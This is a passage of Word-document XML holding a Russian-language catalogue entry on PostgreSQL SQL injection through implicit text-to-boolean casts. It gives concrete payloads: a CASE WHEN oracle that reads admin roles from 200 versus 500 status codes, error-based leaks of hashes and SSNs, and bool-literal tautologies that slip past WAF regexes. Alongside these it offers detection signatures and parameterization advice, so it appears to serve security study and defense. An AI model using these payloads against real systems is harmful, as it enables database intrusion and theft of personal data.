    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer, который блокирует только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наивен. Полный фильтр требует регистронезависимого блокирования всех 12+ литералов плюс whitespace-вариантов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'  true  '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → cast c trim-ом → true). Реальные WAF этого не делают.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — short-circuit boolean-channel oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: error-based blokirovan (catch-all 500 в приложении не возвращает текст ошибки клиенту). Но HTTP-status-разделение работает: 200 vs 500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE is_active = '&lt;is_active&gt;' AND id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не гарантирует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> left-to-right evaluation. Планировщик может выбрать порядок. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid-boolean-cast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это runtime exception, который пробрасывается вверх по дереву execution, прерывая весь statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — leak через timing of error:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">case when (select role='admin' from users where id=1) then 't' else 'invalid_bool_lol' end</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 FROM users WHERE is_active = case when (select role='admin' from users where id=1) then 't' else 'invalid_bool_lol' end AND id = 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Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role='admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CASE вычисляется в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cast проходит, дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — статус 200 (или 404 если нет такого user, но без exception).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Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role != 'admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CASE вычисляется в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'invalid_bool_lol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, cast падает с exception → 500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий читает boolean answer по HTTP-status, без видения текста ошибки. Это классический boolean-blind (3.3), но через BOOLEAN-cast-channel — добавочный oracle поверх обычных тавтологий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Преимущество перед 3.3 (boolean-blind через тавтологию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1</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WAF, который блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.9.0), не покрывает CASE-через-cast-error.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BOOLEAN cast-error даёт более жёсткий 500 status (vs 200/200-differ в обычном boolean-blind), что упрощает автоматизацию sqlmap-уровня tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — leak password hash, ssn, internal data через текст error.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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход naive bool-sanitizer; tautology </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'yes'='on'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приводит к универсальному match.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean-oracle через 200/500 HTTP-status без видимого error.</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Cast `::boolean`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — implicit, пишется кодом приложения, не приходит из payload. WAF не может его блокировать (это не строка в запросе атакующего).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 на ключевые слова (`true`, `false`, `1=1`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — не покрывает альтернативные bool-литералы.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Error-based via INT-cast (3.2.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> часто в WAF blacklist (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b::int\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); error-based via BOOLEAN — нет: bool-cast выглядит как обычное сравнение в WHERE.</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text→boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — implicit, документирована: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE CAST (text AS boolean)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> встроен в core. Список принимаемых литералов — в https://www.postgresql.org/docs/current/datatype-boolean.html.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Coercion happens at execution time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не plan-time. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT '&lt;dynamic&gt;'::boolean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WHERE bool_col = '&lt;dynamic&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> бросает ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">во время</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнения, что попадает в exception-handler приложения.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Error-сообщение содержит точное invalid-значение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это часть PG error-handling philosophy (помогать разработчику видеть, что было). В application-context —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Conditional evaluation `CASE WHEN ... THEN ... ELSE ... END`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — гарантированно вычисляет только одну ветку (документировано); это исключение из общего правила «PG не гарантирует evaluation order операндов».</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-тип в PG с самого начала, coercion-правила стабильны.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SELECT на target table.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Колонка BOOLEAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в WHERE-сравнении с user-input в text-форме.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Application-error пробрасывается в HTTP-ответ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для Payload A. Для Payload C достаточно 500-status.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 Cast-правила — core PG.</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60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE active = $1</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через параметризацию (bind value автоматически cast-ится при типизировании target column) — стандартно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака отличается: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Текст error содержит длинные подстроки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (&gt;50 символов, hash-like, base64-like) → почти всегда leak attempt.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запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE is_active = '...' || (SELECT ...)::text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкатенация в WHERE-bool-comparison, нелегитимная для production-кода (там просто bind value).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HTTP-error pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одинаковые 500 ошибки в логах web-сервера с тем же endpoint, но разными query-string — boolean-blind через cast.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`CASE WHEN ... THEN 't' ELSE 'invalid_x' END`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в логах — explicit oracle-маркер.</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7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий класс. 3.11.1 — отдельный channel через BOOLEAN-cast; механика идентична.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Payload C — альтернативный oracle через cast-error вместо tautology.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3.9.6 (Whitespace tricks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bool-literals принимаются с whitespace (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'  true  '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после trim — true). Сигнатура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR\s+'1'\s*=\s*'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (text-comparison) и не покрывает bool-equivalent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR\s+'on'\s*=\s*'yes'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3.11.2/3.11.3/3.11.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельные классы 3.11. Все используют implicit coercion для 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регекса для concat-в-bool-context (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=\s*['"][^'"]*['"]\s*\|\|</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3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.11.md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Boolean Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — list принимаемых литералов.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Type Conversion — Implicit Casts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
